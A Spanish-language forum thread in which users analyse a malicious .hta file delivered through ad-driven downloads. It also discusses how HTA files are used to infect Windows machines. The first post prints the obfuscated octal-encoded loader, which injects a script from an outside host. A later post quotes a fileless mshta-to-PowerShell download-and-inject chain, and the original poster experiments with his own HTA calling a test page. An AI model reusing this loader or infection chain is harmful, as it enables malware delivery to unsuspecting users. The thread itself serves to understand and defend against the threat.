[SOLUCIONADO] Nuevo malware via archivo HTA

Flamer · Mayo 09, 2025, 07:07:06 PM

Hola he estado navegando en algunas paginas y me salen publicidad y de repente se descargan archivos zip o 7z y al descomprimirlo aparece un archivo .hta...bueno al abrirlo contiene lo siguiente

Código: text

<script>



document.write("\154\074\163\143\162\151\160\164\040\163\162\143\075\150\164\164\160\163\072\057\057\063\141\071\143\060\071\066\064\056\160\162\145\143\162\145\141\164\151\166\145\056\160\151\143\163\057\061\165\164\066\151\065\166\143\144\070\064\152\065\076\074\057\163\143\162\151\160\164\076\152\144\145\154")


</script>

asi que no lo ejecute..... cambie el document.write por un alert aver que imprimia y sale esto

por lo que veo redirige a una pagina... pero no entiendo como el atacante puede infectar mi computadora tiene algun bug los archivos hta al visitar dicha web... no entiendo

saludos Flamer y mi navegador chrome me lo marca como peligroso

AXCESS · Mayo 09, 2025, 09:41:37 PM

Hola No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No soy experto en malware, pero le dejo mi experiencia.

Sí, son Troyanos.

Me los he encontrado en todas partes, e incluso en Telegram.

Recién en dicho Telegram, en un canal, había "un pillo" que entre las cosas que compartía, exponía una página de Phishing para Instagram. Se descargaba de manera automática y tenía ese formato. Enseguida mi sistema de seguridad me lo detuvo marcándomelo como Troyano.

Muchas más anécdotas tengo, pero el punto es que están de moda. Fundamentalmente vienen en forma de inyección o autodescarga.

Flamer · Mayo 09, 2025, 10:26:27 PM

orale estaria bien saber como funciona... creo que si pongo codigo javascript en la pagina a llamar desde el archivo .hta se ejecutara en la maquina victima creo seria cuestion de averiguar

saludos

AXCESS · Mayo 09, 2025, 11:12:26 PM

Imagino, por lógica de función, que establece un proceso primario de penetración para ejecutar algún script y continuar con la cadena de infestado en llamados y descargas.

A modo de conversación, y Ud. que le asiste la experiencia en el tema dirá, lo más parecido que he encontrado al proceso de ejecución (según me lo imagino) es este, pero a través de un email como vía para colarlo:

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

"El archivo adjunto consiste en un archivo .hta (aplicación HTML), que puede usarse para implementar otro malware...[nota:el que esté de moda]"

"Este malware sin archivos tiene un formato Portable Executable (PE), que se ejecuta sin crear el archivo en el sistema de la víctima. [...] Además del correo electrónico, incluye un archivo adjunto con una imagen ISO incrustada con un archivo de script .hta. Este archivo se ejecuta mediante mshta.exe (aplicación HTML de Microsoft).

Según los informes compartidos con Cyber Security News, cuando las víctimas ejecutan este archivo ISO [nota:puede ser una auto descarga u otra vía], se ejecuta el archivo .hta incrustado, lo que crea un árbol de procesos que consta de los procesos mshta.exe, cmd.exe, powershell.exe y RegAsm.exe en orden.

El proceso mshta.exe ejecuta un comando de PowerShell. Este comando contiene argumentos para solicitar datos de cadena codificados en base64 al servidor (DownloadString), que carga los datos de CurrentDomain.Load para llamar a una función. Sin embargo, no se crea un archivo binario en un archivo PE, sino que se ejecuta en la memoria de PowerShell.

Además, el script de PowerShell también ejecuta un archivo DLL decodificado a partir de una cadena Base64. Este archivo DLL descarga el binario final del servidor C2 y lo inyecta en RegAsm.exe (Herramienta de Registro de Ensamblados). Este binario final podría ser cualquier malware ..."

No sé si logra ver el proceso, que lo que variaría es la vía en la que entra al sistema, a través de la interacción de la víctima en internet, y de ahí empieza a "levantar" o a llamar procesos que descarga.

Por ahí debe andar el negocio... más menos...

The Cid James · Mayo 10, 2025, 09:38:49 PM

caracteres ASCII xD poca imaginación tienen los muchacos, de todas formas siempre es bueno tener un bloqueador como NOSCRIPT para minimizar riesgos al nevagar y en los SO siempre usar una cuenta sin privilegios a menos que sea necesario

AXCESS · Mayo 11, 2025, 01:54:29 PM

Se pone la respuesta acertada que le brindaron en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, por un conocedor, por si se compartiere la curiosidad.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No estábamos desacertados después de todo.

Flamer · Mayo 13, 2025, 06:29:30 PM

no entiendo algo yo hice un script en hta y no redirecciona a la pagina este es el codigo

Código: text

fff<script>
src="http://flamerprogramacion.fwh.is/inicio.html"

</script>fff

de perdida me debe de mostrar el alert de mi pagina de prueba...no entiendo como atakan...despues puse href y si redirecciona pero no se ejecuta en el hta sino que abre el navegador de windows

saludos Flamer

[SOLUCIONADO] Nuevo malware via archivo HTA

Flamer

Mayo 09, 2025, 07:07:06 PM Ultima modificación: Mayo 11, 2025, 01:55:57 PM por AXCESS

AXCESS

Mayo 09, 2025, 09:41:37 PM #1

Flamer

Mayo 09, 2025, 10:26:27 PM #2

AXCESS

Mayo 09, 2025, 11:12:26 PM #3 Ultima modificación: Mayo 10, 2025, 04:53:28 PM por AXCESS

The Cid James

Mayo 10, 2025, 09:38:49 PM #4

AXCESS

Mayo 11, 2025, 01:54:29 PM #5 Ultima modificación: Mayo 11, 2025, 07:36:01 PM por AXCESS

Flamer

Mayo 13, 2025, 06:29:30 PM #6